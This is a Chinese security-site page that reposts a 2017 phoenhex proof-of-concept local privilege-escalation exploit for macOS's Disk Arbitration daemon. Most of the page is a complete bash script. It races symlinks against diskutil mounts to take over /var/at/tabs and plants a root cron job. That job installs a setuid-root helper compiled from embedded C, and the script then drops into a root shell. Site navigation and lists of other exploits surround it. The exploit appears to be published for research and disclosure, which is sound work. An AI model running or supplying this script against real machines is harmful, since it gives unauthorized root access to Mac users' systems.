首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple macOS - Disk Arbitration Daemon Race Condition
来源:https://phoenhex.re 作者:phoenhex 发布时间:2017-06-13  
#!/bin/bash
 
# Sources:
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
 
if ! security authorize system.volume.internal.mount &>/dev/null; then
  echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
  exit 1
fi
 
TARGET=/private/var/at
SUBDIR=tabs
DISK=/dev/disk0s1
 
TMPDIR=/tmp/pwn
mkdir -p $TMPDIR
cd $TMPDIR
 
cat << EOF > boom.c
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char ** argv) {
  assert(argc == 2);
  setuid(0);
  setgid(0);
  system(argv[1]);
}
EOF
clang boom.c -o _boom || exit 1
 
race_link() {
  mkdir -p mounts
 
  while true; do
    ln -snf mounts link
    ln -snf $TARGET link
  done
}
 
race_mount() {
  while ! df -h | grep $TARGET >/dev/null; do
    while df -h | grep $DISK >/dev/null; do
      diskutil umount $DISK &>/dev/null
    done
    while ! df -h | grep $DISK >/dev/null; do
      diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
    done
  done
}
 
cleanup() {
  echo "Killing child process $PID and cleaning up tmp dir"
  kill -9 $PID
  rm -rf $TMPDIR
}
 
if df -h | grep $DISK >/dev/null; then
  echo 2>&1 "$DISK already mounted. Exiting."
  exit 1
fi
 
race_link &
PID=$!
trap cleanup EXIT
echo "Just imagine having that root shell. It's gonna be legen..."
race_mount
 
echo "wait for it..."
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
rm -f /var/at/tabs/root
echo "* * * * *" "$CMD" > /var/at/tabs/root
 
while ! [ -e $TMPDIR/boom ]; do
  sleep 1
done
 
echo "dary!"
kill -9 $PID
sleep 0.1
$TMPDIR/boom "rm /var/at/tabs/root"
$TMPDIR/boom "umount -f $DISK"
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple macOS 10.12.3 / iOS < 10
·IPFire 2.19 - Remote Code Exec
·Mapscrn 2.03 - Local Buffer Ov
·VMware vSphere Data Protection
·VMware Workstation 12 Pro - De
·EFS Easy Chat Server 3.1 - Pas
·Windows UAC Protection Bypass
·EFS Easy Chat Server 3.1 - Pas
·Mikrotik RouterOS 6.28 FTP Buf
·EFS Easy Chat Server 3.1 - Buf
·PuTTY < 0.68 - 'ssh_agent_chan
·Disk Sorter 9.7.14 - 'Input Di
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved